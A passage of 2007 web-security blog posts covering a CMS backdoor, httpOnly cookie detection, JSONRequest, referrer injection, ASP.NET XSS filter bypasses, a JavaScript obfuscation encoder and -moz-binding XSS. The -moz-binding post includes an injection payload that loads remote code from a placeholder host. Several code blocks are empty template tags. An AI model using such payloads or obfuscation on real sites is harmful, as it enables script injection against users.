As the title says, heise Security have found a backdoor in the Artmedic CMS system. The interesting question is how this backdoor was implanted - giving the benefit of the doubt it's possible that the development server was compromised and the code injected (the changes date back to the 2nd of May), but on the other hand the developer's not to heise's emails could be indicative of something more sinister.

http://websecurity.com.ua/category/moseb/ MOSEB month of search engine bugs was originally published by Martin Paul Eve at Martin Paul Eve on May 16, 2007.

Admittedly of limited use, here is a JavaScript function I wrote to detect the presence of httpOnly cookies. In Firefox the function will overwrite the real value of the cookie, so before using this function it is vital to try and read the cookie normally! Here is the script embedded in a test PHP page.

A proposed extension to the currently supported set of ...Request objects is JSONRequest, interesting from a security point of view because the proponents of the project wish to allow JSONRequest to violate the Same Origin Policy. This post will give a brief overview of the security features toted by JSONRequest and of how they potentially could allow an attacker to compromise a site more effectively.

Many sites use JavaScript methods to inject a hidden form field into 404 pages to trace the original page that points to the invalid link. An example of this can be found at http://www.yaldex.com/FSPageDetails/_404Referrer.htm. The attentive observer will spot that this method of writing the field injects the HTTP referrer directly into the page without any sanitization. So what?

ASP.NET comes preloaded with some default XSS protection which is actually pretty nifty. However, it turns out that the system can be circumvented by a variety of methods, as illustrated by this test input: {% highlight html %} {% endhighlight %} Turns out that IE will still process attributes on closing tags which circumvents the filter for <a whilst also treating /**/ as a null comment but obviously breaking .NET's filter regex.

Here is a nice tool for encoding JavaScript into eval(String.fromCharCode(x,x,x)) format. A full HTML page is listed here, or you can try it out live at the bottom of this post. {% highlight html %} {% endhighlight %} Encode JavaScript eval String.fromCharCode encoder was originally published by Martin Paul Eve at Martin Paul Eve on May 15, 2007.

Today I wrote a simple tool to illustrate the binding of a Javascript document to a page using Firefox's XBL support (-moz-binding) in an XSS context. The process works as follows: Inject attributes as follows (different encodings may be necessary): <element style = "-moz-binding:url('http://site.com/STXSS_XBL.xml#loader');" />. Browser loads XBL document.

pdp has an interesting post from last month about amendments to the British Computer Misuse Act that specify the illegality of "making, supplying or obtaining articles for use in computer misuse offences". Time to make a "terms and conditions" for this site. Amendments to the British Computer Misuse Act was originally published by Martin Paul Eve at Martin Paul Eve on May 15, 2007.